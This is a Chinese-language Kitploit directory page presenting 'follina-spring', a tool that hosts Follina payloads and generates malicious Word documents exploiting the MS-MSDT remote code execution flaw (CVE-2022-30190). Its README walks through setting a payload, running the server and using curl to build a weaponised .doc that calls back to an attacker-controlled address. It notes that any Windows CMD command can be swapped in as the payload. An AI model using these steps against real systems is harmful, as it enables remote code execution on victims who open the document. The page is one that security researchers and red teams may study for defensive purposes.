Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
follina-spring — 用于托管/激活Follina载荷的服务器,以及生成利用MS-MSDT协议的恶意Word文档。(CVE-2022-30190) | Kitploit
工具/GitHubGitHub/dsibilio/follina-spring
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubdsibilio/follina-spring

follina-spring

用于托管/激活Follina载荷的服务器,以及生成利用MS-MSDT协议的恶意Word文档。(CVE-2022-30190)

查看仓库
44年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Follina MS-MSDT 利用 —— 基于 Spring Boot

本仓库包含一个简单的 Spring Boot 应用程序,它既可作为服务器来 托管/激活 Follina payload,也可作为 恶意 Word 文档的生成器,用于作为攻击向量利用 CVE-2022-30190。

此漏洞涉及通过 MSDT (Microsoft Windows 支持诊断工具) 实现 远程代码执行。

服务端 Payload

若要提供你选择的唯一 payload,应执行以下操作:

  • 定义 payload,例如:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • 运行 服务器 以托管静态 payload:
root@kitploit:~
mvn spring-boot:run
  • 生成 "Follina" Word 文档:
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

如果你想更改当前 payload,则必须先关闭当前活动的服务器,然后定义新的 payload 后重复上述步骤。

注意: payload 可以替换为任何其他命令,只要它能通过 Windows CMD 运行即可。

客户端 Payload

若要提供你选择的客户端 payload,应执行以下操作:

  • 运行 服务器 以在运行时激活 payload:
root@kitploit:~
mvn spring-boot:run
  • 生成 "Follina" Word 文档,指定 cmd 查询参数,例如:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

在这种情况下,payload 嵌入在文档中,只需通过联系服务器进行 激活。这样,你可以在不同的文档中分发多个不同的 payload,无需重启服务器即可触发 payload 更改 —— 只需生成一个嵌入了所需 payload 的新文档即可。

致谢

非常感谢 John Hammond 提供了 Python 实现,并分享了他对该 CVE 的分析。

下载工具